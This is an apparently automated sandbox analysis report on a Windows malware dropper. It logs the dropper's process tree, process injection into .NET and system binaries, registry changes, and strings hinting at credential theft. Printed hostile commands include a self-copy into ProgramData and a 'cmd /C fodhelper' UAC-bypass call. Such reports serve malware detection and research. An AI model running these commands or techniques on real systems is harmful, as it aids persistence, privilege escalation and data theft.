Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: nsi4BEF.tmp.exe, 0000001E.00000003.2312993968.000000000260B000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2453338917.0000000002EF4000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2335459447.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: W73PCbSH71.exe	ReversingLabs: Detection: 78%
Source: W73PCbSH71.exe	Virustotal: Detection: 81%

Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: REQUESTED-ADDRESS-FAMILYRequest Entity Too LargeSA Eastern Standard TimeSA Pacific Standard TimeSA Western Standard TimeSafeArrayAllocDescriptorSetConsoleCursorPositionSetDefaultDllDirectoriesSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDe
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: yscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerCo
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: PED-ADDRESSMAX_FRAME_SIZEMB; allocated MakeAbsoluteSDMissing quotesModule32FirstWNetUserGetInfoNot AcceptableNtResumeThreadOSArchitectureOpenSCManagerWOther_ID_StartPROTOCOL_ERRORPattern_SyntaxProcess32NextWProtection DirQuotation_MarkRCodeNameErrorREFUSED_STR
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: inateProcessTor current modeTor is dowloadedTranslateMessageTrustedInstallerUnregisterClassWUpgrade RequiredUser-Agent: %s VirtualProtectExWinVerifyTrustExWindows DefenderWww-AuthenticateXOR-PEER-ADDRESSZanabazar_Square\windefender.exe runtime stack: address
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: unknown network unpacking headerworkbuf is emptywrite config: %wwww-authenticate spinningthreads=%%!%c(big.Int=%s)%s/address/%s/txs, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method AdjustToke
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: Temporary RedirectTerminateJobObjectTime.MarshalJSON: Time.MarshalText: UNKNOWN-ATTRIBUTESUNKNOWN_SETTING_%dUnknown value typeVariation_SelectorWeb Downloader/6.9WriteProcessMemoryXOR-MAPPED-ADDRESSadaptivestackstartbad Content-Lengthbad manualFreeListbufio: b
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: .654WDG_Validator/1.6.2WSALookupServiceEndWaitForSingleObjectWindowsCreateStringWindowsDeleteStringWinmonSystemMonitorXOR-RELAYED-ADDRESSYukon Standard Timeadjusttimers: bad pafter array elementattribute not foundbad ABI descriptionbad file descriptorbad kind

Source: unknown	Process created: C:\Users\user\Desktop\W73PCbSH71.exe C:\Users\user\Desktop\W73PCbSH71.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\jfhrjta C:\Users\user\AppData\Roaming\jfhrjta
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\907.exe C:\Users\user\AppData\Local\Temp\907.exe
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3613.exe C:\Users\user\AppData\Local\Temp\3613.exe
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe "C:\Users\user\AppData\Local\Temp\InstallSetup8.exe"
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe "C:\Users\user\AppData\Local\Temp\InstallSetup8.exe"
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Process created: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe "C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Process created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3FF8.exe C:\Users\user\AppData\Local\Temp\3FF8.exe
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Process created: C:\Users\user\AppData\Local\Temp\tuc4.exe "C:\Users\user\AppData\Local\Temp\tuc4.exe"
Source: C:\Users\user\AppData\Local\Temp\3FF8.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\3FF8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Process created: C:\Users\user\AppData\Local\Temp\etopt.exe "C:\Users\user\AppData\Local\Temp\etopt.exe"
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Process created: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp "C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp" /SL5="$40060,7884275,54272,C:\Users\user\AppData\Local\Temp\tuc4.exe"
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Process created: C:\Users\user\AppData\Local\Temp\etopt.exe "C:\Users\user\AppData\Local\Temp\etopt.exe"
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Process created: C:\Users\user\AppData\Local\Temp\tuc4.exe "C:\Users\user\AppData\Local\Temp\tuc4.exe" /SPAWNWND=$104BA /NOTIFYWND=$40060
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4BEF.exe C:\Users\user\AppData\Local\Temp\4BEF.exe
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Process created: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp "C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp" /SL5="$10526,7884275,54272,C:\Users\user\AppData\Local\Temp\tuc4.exe" /SPAWNWND=$104BA /NOTIFYWND=$40060
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Process created: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5A58.exe C:\Users\user\AppData\Local\Temp\5A58.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\617D.exe C:\Users\user\AppData\Local\Temp\617D.exe
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\7D14.exe C:\Users\user\AppData\Local\Temp\7D14.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9234.exe C:\Users\user\AppData\Local\Temp\9234.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A203.exe C:\Users\user\AppData\Local\Temp\A203.exe
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy "C:\Users\user\AppData\Local\Temp\9234.exe" "C:\ProgramData\xQfUeydaBrjuHptx.exe" && ping 1.1.1.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\ABF7.exe C:\Users\user\AppData\Local\Temp\ABF7.exe
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 23
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\907.exe C:\Users\user\AppData\Local\Temp\907.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3613.exe C:\Users\user\AppData\Local\Temp\3613.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3FF8.exe C:\Users\user\AppData\Local\Temp\3FF8.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4BEF.exe C:\Users\user\AppData\Local\Temp\4BEF.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5A58.exe C:\Users\user\AppData\Local\Temp\5A58.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\617D.exe C:\Users\user\AppData\Local\Temp\617D.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\7D14.exe C:\Users\user\AppData\Local\Temp\7D14.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9234.exe C:\Users\user\AppData\Local\Temp\9234.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A203.exe C:\Users\user\AppData\Local\Temp\A203.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\ABF7.exe C:\Users\user\AppData\Local\Temp\ABF7.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe "C:\Users\user\AppData\Local\Temp\InstallSetup8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Process created: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe "C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Process created: C:\Users\user\AppData\Local\Temp\tuc4.exe "C:\Users\user\AppData\Local\Temp\tuc4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Process created: C:\Users\user\AppData\Local\Temp\etopt.exe "C:\Users\user\AppData\Local\Temp\etopt.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Process created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Process created: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Users\user\AppData\Local\Temp\3FF8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Process created: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp "C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp" /SL5="$40060,7884275,54272,C:\Users\user\AppData\Local\Temp\tuc4.exe"
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Process created: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp "C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp" /SL5="$10526,7884275,54272,C:\Users\user\AppData\Local\Temp\tuc4.exe" /SPAWNWND=$104BA /NOTIFYWND=$40060
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 23
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\617D.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\dialer.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy "C:\Users\user\AppData\Local\Temp\9234.exe" "C:\ProgramData\xQfUeydaBrjuHptx.exe" && ping 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\net.exe	Process created: unknown unknown

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\etopt.exe

File written: C:\Program Files (x86)\ClocX\Presets\Alte Standuhr.ini

Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe

Window found: window name: TButton

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\907.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\System32\dialer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook

Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source:	Binary string: kernel32.pdbUGP source: dialer.exe, 00000022.00000003.2201377378.000001B8F63D0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Loader.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: EfiGuardDxe.pdb7 source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2416198321.00000000029D5000.00000040.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: 907.exe, 00000006.00000002.1919407201.0000000004AFF000.00000004.00000800.00020000.00000000.sdmp, 907.exe, 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmp, 907.exe, 00000006.00000002.1919407201.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, 4BEF.exe, 0000001C.00000002.2463972164.0000000006FD4000.00000004.00000800.00020000.00000000.sdmp, 4BEF.exe, 0000001C.00000002.2618731211.000000006991D000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\zinazibemur\wemotugiw_cudeyatofo88\gajore\fozomupa96\m.pdb source: nsi4BEF.tmp.exe, 0000001E.00000000.2093402558.0000000000424000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: Age does not matchThe module age and .pdb age do not match. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\rosicena2\regitel_vasecivi\yiyimuk hef\faxezok.pdb source: 5A58.exe, 0000001F.00000003.2159199325.000000000096E000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000000.2111278135.000000000044D000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: symsrv.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003F38000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003649000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000C7A000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: ntdll.pdbUGP source: dialer.exe, 00000022.00000003.2190774257.000001B8F6500000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: RegSvcs.exe, 00000008.00000002.3182406330.0000000000F42000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Downloading symbols for [%s] %ssrvsymsrvhttp://https://_bad_pdb_file.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\rosicena2\regitel_vasecivi\yiyimuk hef\faxezok.pdb`C source: 5A58.exe, 0000001F.00000003.2159199325.000000000096E000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000000.2111278135.000000000044D000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mentorship_and_software_support.pdb source: 907.exe, 00000006.00000000.1906824742.0000000000DD1000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdbUGP source: dialer.exe, 00000022.00000003.2209743343.000001B8F65F0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2203687364.000001B8F6310000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Unable to locate the .pdb file in this location source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
